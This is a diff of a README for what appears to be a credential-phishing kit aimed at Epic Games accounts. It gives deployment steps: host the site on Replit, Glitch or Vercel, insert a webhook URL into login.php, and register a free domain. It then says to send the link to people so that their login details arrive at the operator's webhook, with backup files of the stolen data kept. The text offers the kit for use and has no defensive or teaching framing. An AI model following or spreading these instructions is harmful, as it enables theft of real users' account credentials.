dimondkingYT717/epic-games-phishing/README.md

 2. Upload it on a host like Replit, Glitch, Vercel (Im using Replit)
 4. Go in `login.php`, and put your webhook url.
 (You can enable ping too)
 5. Then Your program is ready !
-(if you want to setup a free domain to your website, i recommend to use [Freenom](https://www.freenom.com))
+(if you want to setup a free domain to your website, i recommend to use [Freenom](https://www.freenom.com).
+You can setup your domain by following a youtube tutorial its ezy dont worry)

-# ❓ - How to Use ?
+# ❓ - How do its work ?
+Copy the link and send it to someone idk 🤷‍♂️.
+Then when the user loggin, you are going to recive the webhook embed with all infos [Exemple here]() There is 2 files with the infos that are going to be created in case your webhook get deleted or if you server got deleted, again, idk 🤷‍♂️.